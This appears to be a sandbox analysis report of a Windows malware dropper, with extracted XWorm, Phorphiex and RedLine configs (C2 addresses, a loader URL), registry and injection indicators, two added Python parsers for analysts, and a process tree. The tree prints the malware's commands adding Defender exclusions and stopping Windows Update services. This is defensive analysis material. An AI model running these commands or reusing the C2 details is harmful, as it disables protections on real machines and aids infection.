Analysis
max time kernel: 116s
max time network: 134s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-10-2024 19:01
Static task: static1
Behavioral task: behavioral1
  Sample: 4363463463464363463463463.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 4363463463464363463463463.exe
  Resource: win10v2004-20241007-en
General
Target: 4363463463464363463463463.exe
Size: 10KB
MD5: 2a94f3960c58c6e70826495f76d00b85
SHA1: e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256: 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512: fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP: 192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
  URL: https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1
Extracted
  Family: xworm
  Version: 5.0
  C2: 110.164.203.191:7000
  AExowENWrg3jY19C
  Install_directory: %Temp%
  install_file: windows32.exe
Extracted
  Family: phorphiex
  C2: http://185.215.113.84
Extracted
  Family: xworm
  install_file: wintousb.exe
Signatures
Detect Xworm Payload 3 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | family_xworm
  behavioral2/memory/4608-24-0x0000000000160000-0x0000000000170000-memory.dmp | family_xworm
  behavioral2/memory/1800-1543-0x000001CD7EE70000-0x000001CD7EE88000-memory.dmp | family_xworm
Modifies security service 2 TTPs 1 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | sysppvrdnvs.exe
Phorphiex family
Phorphiex payload 1 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe | family_phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 1 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3760-145-0x0000000000400000-0x0000000000428000-memory.dmp | family_redline
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
  description | pid | process | target process | count
  PID 5076 created 3348 | 5076 | 2578611513.exe | Explorer.EXE | 2
  PID 5008 created 3348 | 5008 | winupsecvmgr.exe | Explorer.EXE | 3
  PID 3204 created 3348 | 3204 | winn.exe | Explorer.EXE | 8
Windows security bypass 6 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysppvrdnvs.exe
Xworm family
Blocklisted process makes network request 7 IoCs
Processes:
  flow | pid | process
  167 | 4248 | powershell.exe
  172 | 1800 | powershell.exe
  173 | 4248 | powershell.exe
  174 | 4248 | powershell.exe
  175 | 1800 | powershell.exe
  180 | 1800 | powershell.exe
  183 | 1800 | powershell.exe
Command and Scripting Interpreter: PowerShell 12 IoCs
Processes:
  pid | process
  1800 | powershell.exe
  2612 | powershell.exe
  3316 | powershell.exe
  3656 | powershell.exe
  2896 | powershell.exe
  4248 | powershell.exe
  3764 | powershell.exe
  4816 | powershell.exe
  1740 | powershell.exe
  4504 | powershell.exe
  4048 | powershell.exe
  2428 | powershell.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | installs.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | 667532329.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | mshta.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | mshta.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | 4363463463464363463463463.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | sysppvrdnvs.exe
Drops startup file 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk | XClient.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows32.lnk | XClient.exe
Executes dropped EXE 22 IoCs
Processes:
  pid | process
  3480 | LummaC2.exe
  4608 | XClient.exe
  5116 | newtpp.exe
  4900 | sysppvrdnvs.exe
  4072 | installs.exe
  2336 | 667532329.exe
  3760 | installs.exe
  5004 | 776723694.exe
  2340 | 601415316.exe
  5076 | 2578611513.exe
  1880 | 97196632.exe
  3812 | crypted.exe
  3204 | winn.exe
  3532 | Edge.exe
  1784 | Edge.exe
  5008 | winupsecvmgr.exe
  1544 | iupdate.exe
  3636 | cryyy.exe
  1904 | stub.exe
  2036 | stub.exe
  2416 | Updated.scr
  3128 | Updated.scr
Loads dropped DLL 44 IoCs
Processes:
  pid | process | count
  2036 | stub.exe | 22
  3128 | Updated.scr | 22
Windows security modification 7 IoCs
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | sysppvrdnvs.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | sysppvrdnvs.exe
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | newtpp.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows32.exe" | XClient.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qolio = "\"C:\\Users\\Admin\\AppData\\Roaming\\Izkzqdwlb\\Qolio.exe\"" | installs.exe
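The registry writes reported under "Modifies security service", the two Security Center blocks and "Adds Run key" are shown in the kernel's \REGISTRY\MACHINE and \REGISTRY\USER\<SID> form, with WOW6432Node redirection and ControlSet001 left in. An analyst checking a live host queries HKLM/HKU paths instead, so the following added example (not part of the sandbox report) rewrites a sample of those records into that view and states what each write does. The six RECORDS are copied from the report; the path rewriting, the category names and the meaning table are this example's own, and treating ControlSet001 as the live CurrentControlSet is an assumption about the sandbox image.

```python
"""Added example, not part of the sandbox report: translate the registry
writes listed under the security-bypass and persistence signatures into
the HKLM/HKU view an analyst would query on the host, and say what each
write does.

RECORDS are copied from the report. The path rewriting, the category
names and the meaning table are this example's own; treating
ControlSet001 as CurrentControlSet is an assumption about the sandbox
image."""
import re

RECORDS = r'''
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysppvrdnvs.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" newtpp.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows32.exe" XClient.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qolio = "\"C:\\Users\\Admin\\AppData\\Roaming\\Izkzqdwlb\\Qolio.exe\"" installs.exe
'''.strip().splitlines()

_REC_RE = re.compile(r'^Set value \((\w+)\) (.+?) = "(.*)" (\S+)$')
_START_TYPES = {"0": "boot", "1": "system", "2": "automatic", "3": "manual", "4": "disabled"}


def _unescape(value):
    """The report escapes backslashes and quotes inside values."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def normalise_key(path):
    """Kernel-style path -> analyst-style path. Returns (path, wow64)."""
    wow64 = False
    if path.startswith("\\REGISTRY\\MACHINE\\"):
        path = "HKLM\\" + path[len("\\REGISTRY\\MACHINE\\"):]
    elif path.startswith("\\REGISTRY\\USER\\"):
        path = "HKU\\" + path[len("\\REGISTRY\\USER\\"):]  # HKU\<SID> is that user's HKCU
    if "\\WOW6432Node\\" in path:
        wow64 = True  # written through the 32-bit redirected view
        path = path.replace("\\WOW6432Node\\", "\\")
    # Assumption: ControlSet001 is the live control set in the sandbox image.
    path = path.replace("\\SYSTEM\\ControlSet001\\", "\\SYSTEM\\CurrentControlSet\\")
    return path, wow64


def classify(key, name, value):
    """Category and one-line meaning for a (key, value name, data) triple."""
    k = key.lower()
    if re.search(r"\\services\\[^\\]+$", k) and name.lower() == "start":
        svc = key.rsplit("\\", 1)[1]
        return "service-start-type", "%s start type set to %s" % (svc, _START_TYPES.get(value, value))
    if k.endswith("\\microsoft\\security center"):
        effect = "notification suppressed" if name.lower().endswith("disablenotify") else "state override"
        return "security-center", "%s=%s (%s)" % (name, value, effect)
    if k.endswith("\\currentversion\\run"):
        scope = "machine" if k.startswith("hklm\\") else "user"
        return "run-key-" + scope, "%s -> %s" % (name, value)
    return "other", "%s=%s" % (name, value)


def analyse(records):
    """One finding dict per parsable record, in input order."""
    findings = []
    for line in records:
        m = _REC_RE.match(line.strip())
        if not m:
            continue
        vtype, path, value, process = m.groups()
        key_path, wow64 = normalise_key(path)
        key, name = key_path.rsplit("\\", 1)
        value = _unescape(value)
        category, note = classify(key, name, value)
        findings.append({"process": process, "type": vtype, "key": key, "name": name,
                         "value": value, "wow64": wow64, "category": category, "note": note})
    return findings


if __name__ == "__main__":
    for f in analyse(RECORDS):
        print("%-16s %-18s %s%s" % (f["process"], f["category"], f["note"],
                                    "  [WOW64]" if f["wow64"] else ""))
```

The wow64 flag matters when verifying on a host: a 32-bit sysppvrdnvs.exe writing to HKLM\SOFTWARE\Microsoft\Security Center lands in the WOW6432Node copy, so a 64-bit registry query of the unredirected path may show the key untouched.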
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
  flow | ioc
  118 | raw.githubusercontent.com
  167 | raw.githubusercontent.com
  172 | raw.githubusercontent.com
  183 | raw.githubusercontent.com
  202 | raw.githubusercontent.com
  54 | bitbucket.org
  55 | bitbucket.org
  117 | raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  164 | ip-api.com
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
  pid | process
  760 | tasklist.exe
  2220 | tasklist.exe
Suspicious use of SetThreadContext 5 IoCs
Processes:
  description | pid | process | target process
  PID 4072 set thread context of 3760 | 4072 | installs.exe | installs.exe
  PID 3812 set thread context of 2712 | 3812 | crypted.exe | RegAsm.exe
  PID 5008 set thread context of 2652 | 5008 | winupsecvmgr.exe | conhost.exe
  PID 5008 set thread context of 4896 | 5008 | winupsecvmgr.exe | dwm.exe
  PID 3204 set thread context of 1084 | 3204 | winn.exe | InstallUtil.exe
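The SetThreadContext records above, read together with the NtCreateUserProcessOtherParentProcess records earlier in this list, separate three behaviours that the raw rows do not distinguish: installs.exe replacing the image of a suspended copy of itself (which is why the report also shows eight WriteProcessMemory calls from 4072 into 3760, and why the RedLine YARA hit is on the memory of 3760), crypted.exe and winn.exe placing their payload in the .NET hosts RegAsm.exe and InstallUtil.exe, and winupsecvmgr.exe targeting dwm.exe and conhost.exe, so that the dwm.exe 4896 activity listed later under FindShellTrayWindow is the injected code. The following added example (not part of the report) parses those records and draws those distinctions. The records are copied from the report with duplicates removed; the record grammar, the TRUSTED_HOSTS list and the category names are this example's own, and reading a "PID X created 3348" record as "X spawned a child that claims Explorer.EXE 3348 as its parent" is an interpretation.

```python
"""Added example (not part of the sandbox report): read the report's
'Suspicious use of SetThreadContext' and
'Suspicious use of NtCreateUserProcessOtherParentProcess' records and
separate self-copy hollowing from injection into trusted Windows
binaries and from parent-PID spoofing.

Records are copied from the report (duplicates removed). The record
grammar, TRUSTED_HOSTS and the category names are this example's own;
reading 'PID X created Y' as 'X spawned a child claiming Y as parent' is
an interpretation."""
import re

SET_THREAD_CONTEXT = """
PID 4072 set thread context of 3760 4072 installs.exe installs.exe
PID 3812 set thread context of 2712 3812 crypted.exe RegAsm.exe
PID 5008 set thread context of 2652 5008 winupsecvmgr.exe conhost.exe
PID 5008 set thread context of 4896 5008 winupsecvmgr.exe dwm.exe
PID 3204 set thread context of 1084 3204 winn.exe InstallUtil.exe
"""

OTHER_PARENT = """
PID 5076 created 3348 5076 2578611513.exe Explorer.EXE
PID 5008 created 3348 5008 winupsecvmgr.exe Explorer.EXE
PID 3204 created 3348 3204 winn.exe Explorer.EXE
"""

# Signed Windows binaries commonly used as hollowing hosts because they are
# expected to run .NET code or exist on every machine. Assumption: this
# allow-list is the analyst's, not the sandbox's.
TRUSTED_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe",
                 "aspnet_compiler.exe", "dwm.exe", "conhost.exe", "svchost.exe"}

_STC_RE = re.compile(r"PID (\d+) set thread context of (\d+) \d+ (\S+) (\S+)")
_OPP_RE = re.compile(r"PID (\d+) created (\d+) \d+ (\S+) (\S+)")


def classify_set_thread_context(text):
    """Return (src_pid, src_image, tgt_pid, tgt_image, category) per record."""
    out = []
    for m in _STC_RE.finditer(text):
        src_pid, tgt_pid, src, tgt = m.groups()
        if src.lower() == tgt.lower():
            # A suspended copy of itself whose image gets replaced (RunPE).
            category = "self-copy"
        elif tgt.lower() in TRUSTED_HOSTS:
            category = "trusted-host"
        else:
            category = "other"
        out.append((int(src_pid), src, int(tgt_pid), tgt, category))
    return out


def ppid_spoofing(text):
    """Map (pid, image) of the spoofing process -> (claimed parent pid, image)."""
    claimed = {}
    for m in _OPP_RE.finditer(text):
        pid, parent_pid, image, parent_image = m.groups()
        claimed[(int(pid), image)] = (int(parent_pid), parent_image)
    return claimed


def spoof_and_inject(stc_text, opp_text):
    """Images that both spoof their parent and redirect a thread: their
    payload ends up in a trusted binary that looks like a child of Explorer."""
    injectors = {(pid, image) for pid, image, *_ in classify_set_thread_context(stc_text)}
    spoofers = set(ppid_spoofing(opp_text))
    return sorted(image for _, image in injectors & spoofers)


def injected_targets(stc_text):
    """PID -> image of every process that received a SetThreadContext, so
    later per-PID activity in the report can be attributed to the injector."""
    return {tgt_pid: tgt for _, _, tgt_pid, tgt, _ in classify_set_thread_context(stc_text)}


if __name__ == "__main__":
    for row in classify_set_thread_context(SET_THREAD_CONTEXT):
        print("%5d %-18s -> %5d %-16s %s" % row)
    print("spoof + inject:", spoof_and_inject(SET_THREAD_CONTEXT, OTHER_PARENT))
```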
Drops file in Windows directory 2 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\sysppvrdnvs.exe | newtpp.exe
  File opened for modification | C:\Windows\sysppvrdnvs.exe | newtpp.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  2920 | sc.exe
  4868 | sc.exe
  1232 | sc.exe
  2932 | sc.exe
  448 | sc.exe
Detects Pyinstaller 1 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Files\stub.exe | pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | installs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 97196632.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | crypted.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cryyy.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sysppvrdnvs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | iupdate.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | LummaC2.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 601415316.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 4363463463464363463463463.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | installs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 776723694.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | newtpp.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | cryyy.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | cryyy.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
  pid | process | count
  4816 | powershell.exe | 3
  1756 | powershell.exe | 3
  2336 | 667532329.exe | 2
  5076 | 2578611513.exe | 4
  3316 | powershell.exe | 2
  5008 | winupsecvmgr.exe | 6
  3656 | powershell.exe | 3
  2896 | powershell.exe | 3
  1740 | powershell.exe | 3
  4248 | powershell.exe | 4
  1800 | powershell.exe | 3
  3204 | winn.exe | 23
  4288 | powershell.exe | 3
  4504 | powershell.exe | 2
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 2664 | 4363463463464363463463463.exe
  Token: SeDebugPrivilege | 4608 | XClient.exe
  Token: SeDebugPrivilege | 4816 | powershell.exe
  Token: SeDebugPrivilege | 1756 | powershell.exe
  Token: SeDebugPrivilege | 2336 | 667532329.exe
  Token: SeDebugPrivilege | 4072 | installs.exe
  Token: SeDebugPrivilege | 3812 | crypted.exe
  Token: SeDebugPrivilege | 3204 | winn.exe
  Token: SeDebugPrivilege | 3316 | powershell.exe
  The remaining 55 entries are all for 3316 powershell.exe, which enables the following set in order (recorded twice in full, then a third time up to SeDebugPrivilege, where the 64-IoC listing ends):
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipP rivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of FindShellTrayWindow 17 IoCs
Processes:
  pid | process | count
  4896 | dwm.exe | 17
Suspicious use of SendNotifyMessage 17 IoCs
Processes:
  pid | process | count
  4896 | dwm.exe | 17
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
  pid | process
  1544 | iupdate.exe
  1800 | powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process | count
  PID 2664 wrote to memory of 3480 | 2664 | 4363463463464363463463463.exe | LummaC2.exe | 3
  PID 2664 wrote to memory of 4608 | 2664 | 4363463463464363463463463.exe | XClient.exe | 2
  PID 2664 wrote to memory of 5116 | 2664 | 4363463463464363463463463.exe | newtpp.exe | 3
  PID 5116 wrote to memory of 4900 | 5116 | newtpp.exe | sysppvrdnvs.exe | 3
  PID 4900 wrote to memory of 2496 | 4900 | sysppvrdnvs.exe | cmd.exe | 3
  PID 4900 wrote to memory of 4976 | 4900 | sysppvrdnvs.exe | cmd.exe | 3
  PID 4976 wrote to memory of 2920 | 4976 | cmd.exe | sc.exe | 3
  PID 2496 wrote to memory of 4816 | 2496 | cmd.exe | powershell.exe | 3
  PID 4976 wrote to memory of 4868 | 4976 | cmd.exe | sc.exe | 3
  PID 4976 wrote to memory of 1232 | 4976 | cmd.exe | sc.exe | 3
  PID 4976 wrote to memory of 2932 | 4976 | cmd.exe | sc.exe | 3
  PID 4976 wrote to memory of 448 | 4976 | cmd.exe | sc.exe | 3
  PID 2664 wrote to memory of 4072 | 2664 | 4363463463464363463463463.exe | installs.exe | 3
  PID 4072 wrote to memory of 1756 | 4072 | installs.exe | powershell.exe | 3
  PID 4900 wrote to memory of 2336 | 4900 | sysppvrdnvs.exe | 667532329.exe | 2
  PID 2336 wrote to memory of 3688 | 2336 | 667532329.exe | cmd.exe | 2
  PID 2336 wrote to memory of 4388 | 2336 | 667532329.exe | cmd.exe | 2
  PID 3688 wrote to memory of 3124 | 3688 | cmd.exe | reg.exe | 2
  PID 4388 wrote to memory of 4728 | 4388 | cmd.exe | schtasks.exe | 2
  PID 4072 wrote to memory of 3760 | 4072 | installs.exe | installs.exe | 8
  PID 4900 wrote to memory of 5004 | 4900 | sysppvrdnvs.exe | 776723694.exe | 3
  PID 4900 wrote to memory of 2340 | 4900 | sysppvrdnvs.exe | 601415316.exe | 2
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
[1] C:\Windows\Explorer.EXE
    cmdline: C:\Windows\Explorer.EXE
    PID: 3348
  [2] C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2664
    [3] C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        PID: 3480
    [3] C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
        - Drops startup file
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of AdjustPrivilegeToken
        PID: 4608
    [3] C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 5116
      [4] C:\Windows\sysppvrdnvs.exe
          cmdline: C:\Windows\sysppvrdnvs.exe
          - Modifies security service
          - Windows security bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Windows security modification
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          PID: 4900
        [5] C:\Windows\SysWOW64\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 2496
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              - Command and Scripting Interpreter: PowerShell
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 4816
        [5] C:\Windows\SysWOW64\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 4976
          [6] C:\Windows\SysWOW64\sc.exe
              cmdline: sc stop UsoSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 2920
          [6] C:\Windows\SysWOW64\sc.exe
              cmdline: sc stop WaaSMedicSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 4868
          [6] C:\Windows\SysWOW64\sc.exe
              cmdline: sc stop wuauserv
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 1232
          [6] C:\Windows\SysWOW64\sc.exe
              cmdline: sc stop DoSvc
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 2932
          [6] C:\Windows\SysWOW64\sc.exe
              cmdline: sc stop BITS /wait
              - Launches sc.exe
              - System Location Discovery: System Language Discovery
              PID: 448
        [5] C:\Users\Admin\AppData\Local\Temp\667532329.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\667532329.exe
            - Checks computer location settings
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 2336
          [6] C:\Windows\System32\cmd.exe
              cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
              - Suspicious use of WriteProcessMemory
              PID: 3688
            [7] C:\Windows\system32\reg.exe
                cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                PID: 3124
          [6] C:\Windows\System32\cmd.exe
              cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
              - Suspicious use of WriteProcessMemory
              PID: 4388
            [7] C:\Windows\system32\schtasks.exe
                cmdline: schtasks /delete /f /tn "Windows Upgrade Manager"
                PID: 4728
        [5] C:\Users\Admin\AppData\Local\Temp\776723694.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\776723694.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            PID: 5004
        [5] C:\Users\Admin\AppData\Local\Temp\601415316.exe
